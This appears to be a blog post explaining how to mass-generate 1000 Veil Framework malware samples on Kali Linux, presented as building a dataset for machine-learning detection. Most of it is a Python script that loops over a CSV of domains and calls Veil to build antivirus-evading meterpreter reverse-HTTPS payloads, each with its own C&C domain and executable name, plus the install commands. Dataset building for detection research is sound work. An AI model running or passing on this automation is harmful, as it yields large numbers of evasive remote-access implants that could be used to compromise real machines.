https://github.com/Veil-Framework
Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.
Purpose: Creation of malware dataset for Machine Learning
Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus.
Overview:Purpose: Creation of malware dataset for Machine Learning
Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus.
1) On a Kali Linux VM
2) Install VEIL framework
apt update
apt -y install veil /usr/share/veil/config/setup.sh --force --silent
import pandas as pd import numpy as np import matplotlib.pyplot as plt import socket from socket import error as socket_error import errno import subprocess from subprocess import Popen #read domain names to use print ("Reading domain names from csv file:") df = pd.read_csv('./website.csv') df.info() df.describe() print ("Loaded domain name file") print("") correctmsg = "Metasploit Resource file written to:" errmsg = "bignum too big to convert" startfrom = 0 for index, row in df.iterrows(): if startfrom > index: print ("skip: "+str(row[1])) continue attempt = 1 #uncomment the 2 lines below to use the resolved ip address instead try: addr = socket.gethostbyname(row[0]) print(addr) except socket_error as serr: if serr.errno == -2: print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.") row[0] = "127.0.0.1" command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + row[0] + " --port 443" binaryname = str(row[1])+".exe" print (command) #set i to any positive number to start the loop i = 9999 x = -1 while x == -1: proc = subprocess.Popen(['./Veil.py','-t','Evasion','-p','cs/meterpreter/rev_https.py','--ip',str(row[0]),'--port','443','-o',str(row[1])], stdout=subprocess.PIPE,stderr=subprocess.PIPE) tmp = proc.communicate()[0] x = tmp.find(correctmsg) #-1 represent errmsg is not found thus implying that crafting is successful i = tmp.find(errmsg) #print ("i value:" + str(i)) if i != -1 : print ("retrying error crafting payload...: attempting " + str(attempt) + " times") attempt = attempt + 1 if x == -1 : print ("error: " + tmp) attempt = attempt + 1 print ("Command: " + command + " is successful.") print ("Saving as :" + binaryname) #subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True) print ("Saved") print ("")
4) Create a csv file using excel with the following format and save it as website.csv:
5) Execute the Python script
cd /usr/share/veil python veil_malware_generation_script.py
7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.
Posts
No comments:
Post a Comment